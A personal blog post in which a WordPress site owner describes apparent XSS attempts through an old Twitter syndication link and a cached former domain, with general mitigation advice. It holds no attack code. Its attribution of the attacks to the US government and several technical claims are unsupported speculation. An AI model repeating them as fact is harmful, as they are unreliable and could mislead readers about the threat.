New XSS Attack Spotted Through Twitter Syndication Connection

Late last month, almost immediately after publishing a Tweet critical of Netflix for hiring Susan Rice, just months after leaked emails implicated her in the illegal smuggling of weapons and munitions into Libya directly in violation of a United Nations embargo, I began to experience a fairly large number of attempted Cross Site Scripting (XSS) attacks through a shared/syndicated connection I had established through Twitter on one of my previous domain names.

Setting up the remainder of the article, months ago when Bankrupt Medi4 was under the name/domain of The Daily Proletariat (https://proletariatdaily.com), I configured my WordPress site to automatically post any/all new articles directly to Twitter remotely. This process is known as Twitter syndication and can be set up manually through the wp-admin Dashboard. Honestly, after switching Twitter handles, transferring domains and making a number of other changes to my site I had completely forgotten about the connection, until the XSS attacks began to pile up.

Using vulnerabilities in the shared connection between Twitter and WordPress, hackers were able to inject malicious JavaScript in an attempt to gain access to and/or hijack my site. Moreover, given that the domain (proletariatdaily) had already long since been removed and disconnected from https://bankruptmedia.com – my current primary domain – this also means that the attackers were attempting to compromise a cached version of my website as it existed before March 2018.

How do I know this?

Cross referencing the 404 Error logs on my Firewall with the timing of the attacks, on multiple occasions I noticed well over 3 dozen hits attached to a URL associated with:

https://proletariatdaily.com/2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/

instead of

https://bankruptmedia.com/2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/

as the website/article currently exists, and has existed for months. ^^^

This means that hackers were attempting XSS attacks on the cached version of the article as it exist before I made the domain switch. For example, here is just a small sample of my firewall logs from 1 of the attacks, and there are over 3 dozens more logs just like it:

No automatic alt text available.

Interestingly enough?

New research published by GoSecure on April 3rd 2017, the same day of one of the attacks above, explains how hackers have begun exploiting holes in cached servers to conduct advanced XSS attacks on the web, exactly the type of XSS attacks I had been experiencing in late March to early April. GoSecure‘s article goes on to explain how:

No automatic alt text available.

Read GoSecure’s Full Article Here: http://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/

How To Mitigate The Attack In The Future?

Disconnecting the shared Twitter syndication connection through wp-admin Dashboard is the obvious fix here, but wouldn’t you know it? As soon as I purged my websites Varnish cache the attacks magically disappeared and I haven’t seen a single one since. This attack also highlights exactly why everyone should disable JavaScript in whatever web browser they happen to use, especially for work. For example, the No-Script browser add-on alerted me to the XSS attack well before I audited my firewall logs. So, shout out to No-Script! 😉 Additionally, in addition to mitigating some forms of DDoS attacks, forcing all of your website’s traffic through https can also help mitigate these specific type of XSS attacks as well.

If you own a WordPress site like me they make plugins specifically designed to purge Varnish cache and/or force website traffic through, just simply enter a search for them to learn more.

Lastly, This Is An Extremely Advanced Attack

Considering that I am the first person on the internet to report this style of XSS attack, at least that I am aware of, and the attacks only started after I criticized the former National Security Advisor for “allegedly” violating international law and contributing to the genocide of thousands of people, I have no reason other than to believe that this attack originated from some of the highest levels of the United States Government – but that might just be the inner ‘tin foil hatter‘ in me talking.

Moreover, considering that the attack involved the attempted exploitation of cached versions of my website, of which new research about this was just published for the first time by GoSecure last week, it’s only testament to just how innovative these attacks really are.



Categories: Hacking News

%d bloggers like this: